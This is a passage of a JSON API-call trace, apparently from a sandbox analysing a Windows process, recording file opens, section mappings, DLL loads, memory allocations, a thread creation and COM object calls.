                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 144
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 145
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 146
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000300"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 147
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000032c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0016a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 148
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 149
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000300"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827bbf0"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 150
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 151
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "wldp.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 152
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wldp"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0500000"
              }
            ],
            "repeated": 0,
            "id": 153
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0500000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 154
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 155
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0016a000"
              }
            ],
            "repeated": 0,
            "id": 156
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\SECURITY"
              },
              {
                "name": "DllBase",
                "value": "0x21e2c090000"
              }
            ],
            "repeated": 0,
            "id": 157
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "SECURITY.DLL"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c090000"
              }
            ],
            "repeated": 0,
            "id": 158
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000032c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\secur32.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 159
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000334"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed5070000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0000c000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 160
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\SECUR32"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed5070000"
              }
            ],
            "repeated": 0,
            "id": 161
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b8c2000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 162
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\schannel"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedfaa0000"
              }
            ],
            "repeated": 0,
            "id": 163
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\schannel.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfaa0000"
              }
            ],
            "repeated": 0,
            "id": 164
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba2c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 165
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "threading",
            "api": "CreateRemoteThreadEx",
            "status": true,
            "return": "0x00000384",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartRoutine",
                "value": "0x7ffec381d930"
              },
              {
                "name": "Parameter",
                "value": "0x7ffec3a04460"
              },
              {
                "name": "CreationFlags",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "4388"
              },
              {
                "name": "ProcessId",
                "value": "3164"
              }
            ],
            "repeated": 0,
            "id": 166
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0a0000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 167
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba2e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 168
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000394"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\tzres.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 169
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000398"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0a0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 170
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000394"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 171
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000398"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0b0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827b400"
              },
              {
                "name": "ViewSize",
                "value": "0x0000b000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 172
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0b0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000b000"
              }
            ],
            "repeated": 0,
            "id": 173
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0a0000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 174
          },
          {
            "timestamp": "2025-11-20 10:58:33,819",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000394"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\tzres.dll"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 175
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000398"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0a0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 176
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000394"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\tzres.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 177
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000398"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0b0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827b400"
              },
              {
                "name": "ViewSize",
                "value": "0x0000b000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 178
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0b0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000b000"
              }
            ],
            "repeated": 0,
            "id": 179
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0a0000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              }
            ],
            "repeated": 0,
            "id": 180
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 181
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba31000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 182
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 183
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 184
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba33000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 185
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee2f66d2f",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000398"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 186
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 187
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffee2fc0030",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 188
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4244",
            "caller": "0x7ff79aafd767",
            "parentcaller": "0x7ff79aaf8fab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
